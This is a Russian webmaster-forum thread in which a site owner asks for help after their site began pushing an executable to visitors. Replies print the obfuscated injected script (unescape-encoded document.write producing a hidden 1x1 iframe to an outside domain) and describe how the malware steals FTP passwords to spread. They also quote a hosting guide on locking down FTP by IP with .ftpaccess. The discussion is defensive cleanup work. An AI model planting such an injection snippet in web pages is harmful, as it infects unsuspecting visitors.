- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
:confused::no: Есть проект. На днях сменил дизайн и начались проблемы.
Сайт - ex-surf.ru
При заходе на сайт подгружается АкробатРидер32.эхе и начинаются жуткие лаги, при чем антивирь молчит. Потом, еще что-то с левых сайтов из зоны .com грузится.
Код смотрел, ничего подозрительного не нашел. Помогите пожалуйста.
приаттачил код на всякий пожарный...
Вот что отдаётся при заходе на Ваш сайт:
=( Масол, спасибо за информацию. Значит, вирус (... не подскажите, что делать? какие меры предпринять?
вот он родимый:
<script>document.write(unescape('%3C')+unescape('%69%66%72')+unescape('%61%6D%65%20')+unescape('%73%72')+unescape('%63%3D%22')+unescape('%68')+unescape('%74%74')+unescape('%70')+unescape('%3A%2F')+unescape('%2F')+unescape('%67%61%76%61')+unescape('%69%2D')+unescape('%70')+unescape('%65')+unescape('%67')+unescape('%63%39%2E%77')+unescape('%73')+unescape('%2F')+unescape('%33%2E%68%74')+unescape('%6D%6C%22%20')+unescape('%77')+unescape('%69%64')+unescape('%74%68%3D%31')+unescape('%20%68')+unescape('%65%69')+unescape('%67%68%74')+unescape('%3D')+unescape('%31%20%73')+unescape('%74%79%6C')+unescape('%65%3D')+unescape('%22%76%69')+unescape('%73%69%62')+unescape('%69%6C%69')+unescape('%74')+unescape('%79%3A%20%68')+unescape('%69%64%64')+unescape('%65%6E')+unescape('%22%3E%3C')+unescape('%2F%69%66%72')+unescape('%61%6D%65%3E')+'');</script>
Частичная расшифровка:
ame src="http://gavai-pegc9.ws/3.html" width=1 height=1 style="visibility: hidden"><
Эх, а я думал, что так и должно быть. Вроде как и раньше был этот кусок...
Спасибо, буду удалять...
Ага, он самый.
Проверяйте весь код на сервере. Хотя в основном заражают index.php во всех папках.
Меняйте пароль ФТП. Может уже и на почту пора менять(.
Где-то на сичах выкладывали скрипт на php позволяющий рекурсивно пройтись по папкам и файлам и удалить вредоносный код по шаблону! Правда, я не нашёл уже(.
удалил еще вчера в header.php сидел
попробуйте вот это
В сообщениях антивирусных служб появилась информация о вирусах, распространяющих себя через веб-сайты. Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя. После этого он начинает отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код или скрипт.
Для обеспечения Вашей безопасности мы включили возможность защиты FTP, ограничив доступ по IP.
В каталоге FTP-аккаунта должен находиться файл с именем .ftpaccess. Если файла нет или файл пустой (нулевой длины) или же в нем строка с точкой (она входит в любой IP-адрес) - доступ открыт для любого IP.
Настройка .ftpaccess файла:
- Если в файле .ftpaccess поставить цифру 1, то доступ будет открыт для всех IP, в которые входит такая цифра.
- Если в этом файле вписать Ваш внешний IP-адрес, доступ будет закрыт для всех других. Это самая эффективная защита вашего сайта.
- Для тех, кто пользуется конструктором для сайтов. Вам необходимо вписать в файл: .ftpaccess IP-адрес вашего сайта и IP–адрес сервера где находится конструктор (обратитесь в нашу тех. поддержку за этим IP-адресом).
- Вписать нужный вам IP адрес в .ftpaccess вы можете с помощью FTP клиента или посредством Файл-менеджера в ДиректАдмине и любой другой панели.
- Если Ваш IP динамический - можно прописать часть адреса, например: 195.131.185 или вписать несколько IP-адресов.
- Для того, чтобы прописать IP адрес с помощью cPanel, зайдите на вашу контрольную панель управления выберите Файл-менеджер, сделайте отметку для Home Directory и поставьые "галочку" в поле Show Hidden Files (dotfiles), кликните на кнопу ”Go”. В списке файлов выберите файл .ftpaccess, кликните правой кнопкой вашей мышки на этот файл, в открывшемся контекстном меню выберите Edit File, далее редактируйте файл .ftpaccess.
Файл .ftpaccess создается в корне Вашего ФТП - /.ftpaccess
Пример создаваемого файла .ftpaccess:
<Directory />
<Limit КОМАНДА>
Allow 192.168. #Группа айпи адресов 192.168.0-255.0-255
Allow 192.168.0. #Группа айпи адресов 192.168.0.0-255
Allow 192.168.0.101 #Если айпи адрес выделенный, то Вам понадобится эта строка.
DenyAll
</Limit>
</Directory>
Команды:
READ — все FTP-команды, связанные с чтением файлов (за исключением команд выдачи листинга содержимого директории), (RETR, SITE, SIZE, STAT);
WRITE — все FTP-команды, связанные с созданием, записью или удалением файлов или директорий (APPE, DELE, MKD, RMD, RNTO, STOR, XMKD, XRMD);
DIRS — все FTP-команды, связанные с выдачей листинга содержимого директории (CDUP, CWD, LIST, MDTM, NLST, PWD, RNFR, XCUP, XCWD, XPWD);
ALL — все FTP-команды (включает в себя все три класса READ, WRITE и DIRS).
Управление доступом в области действия Limit:
Allow from all | none | хост | сеть — разрешение на действие, определенное в директиве Limit, в зависимости от шаблона IP адреса или доменного имени; область действия — Limit; по умолчанию — from all;
AllowAll — явное разрешение доступа к области действия Limit, Anonymous или Directory.
AllowGroup список-групп-через-запятую — для доступа к командам, описанным в данной области действия Limit, пользователь должен входить во все упомянутые группы (AND, возможно отрицание, задаваемое восклицательным знаком перед именем группы). На виртуальном хостинге FTP-пользователи одной площадки относятся к группе uXXXX, где uXXXX – номер площадки.
AllowUser список-имен-через-запятую — для доступа к командам, описанным в данной области действия Limit, пользователь должен иметь указанные имена (AND, возможно отрицание, задаваемое восклицательным знаком перед именем).
Deny from all | none | хост | сеть — запрет на действие, определенное в директиве Limit, в зависимости от шаблона IP адреса или доменного имени; область действия — Limit; по умолчанию — from none.
DenyAll — синоним для команд «order deny,allow;deny from all».
DenyGroup список-групп-через-запятую — запрещен доступ к командам, описанным в данной области действия Limit, пользователям, входящим во все упомянутые группы (AND, возможно отрицание, задаваемое восклицательным знаком перед именем группы)
DenyUser список-имен-через-запятую запрещен доступ к командам, описанным в данной области действия Limit, для пользователей с указанным именем (AND, возможно отрицание, задаваемое восклицательным знаком перед именем).
Order allow,deny | deny,allow — определяет последовательность проверки директив Allow и Deny, а также действия по умолчанию; allow,deny: проверяются директивы Allow, если совпадение найдено, то доступ предоставляется, иначе проверяются директивы Deny и если совпадение найдено, то доступ запрещается, иначе доступ предоставляется; deny,allow: проверяются директивы Deny и если совпадение найдено, то доступ запрещается, иначе проверяются директивы Allow и если совпадение найдено, то доступ предоставляется, иначе доступ запрещается; заметьте, что в Apache по умолчанию производятся противоположные действия!
Взято от сюда